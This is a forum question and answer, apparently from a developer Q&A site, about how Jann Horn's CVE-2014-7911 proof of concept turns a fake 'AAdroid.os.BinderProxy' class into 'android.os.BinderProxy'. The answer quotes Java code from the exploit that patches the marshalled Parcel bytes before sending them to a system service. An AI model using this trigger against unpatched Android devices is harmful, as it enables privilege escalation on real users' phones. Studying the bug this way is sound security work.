# CVE-2014-7911 how is AAdroid.os.BinderProxy cost into android.os.BinderProxy?

Tags: android, security

In http://seclists.org/fulldisclosure/2014/Nov/51
Jann Horn write a POC of CVE-2014-7911, using a fake class AAdroid.os.BinderProxy to trigger "finalize()" function of android.os.BinderProxy.
But I'm not sure how is AAdroid.os.BinderProxy cost into android.os.BinderProxy during Binder communication.

Can someone help answer this question?

Also see:
http://researchcenter.paloaltonetworks.com/2015/01/cve-2014-7911-deep-dive-analysis-android-system-service-vulnerability-exploitation/

Answer (score 0, accepted):

I think I've figure it out.
Class name is modified in this way:

```
public void setApplicationRestrictions(java.lang.String packageName, android.os.Bundle restrictions, int userHandle) throws android.os.RemoteException 
    { 
        android.os.Parcel _data = android.os.Parcel.obtain(); 
        android.os.Parcel _reply = android.os.Parcel.obtain(); 
        try { 
            _data.writeInterfaceToken(DESCRIPTOR); 
            _data.writeString(packageName); 
            _data.writeInt(1); 
            restrictions.writeToParcel(_data, 0); 
            _data.writeInt(userHandle); 
            byte[] data = _data.marshall(); 
            for (int i=0; true; i++) { 
                if (data[i] == 'A' && data[i+1] == 'A' && data[i+2] == 'd' && data[i+3] == 'r') { 
                    data[i] = 'a'; 
                    data[i+1] = 'n'; 
                    break; 
                } 
            } 
            _data.recycle(); 
            _data = Parcel.obtain(); 
            _data.unmarshall(data, 0, data.length); 
            mRemote.transact(TRANSACTION_setApplicationRestrictions, _data, _reply, 0); 
            _reply.readException(); 
        } 
        finally { 
            _reply.recycle(); 
            _data.recycle(); 
        }
    }
```

Notice the code after marshalling, it changes "AA" to "an", thus "AAdroid.os.BinderProxy" becomes "android.os.BinderProxy".

More details need to be studied. I'll continue analyzing it.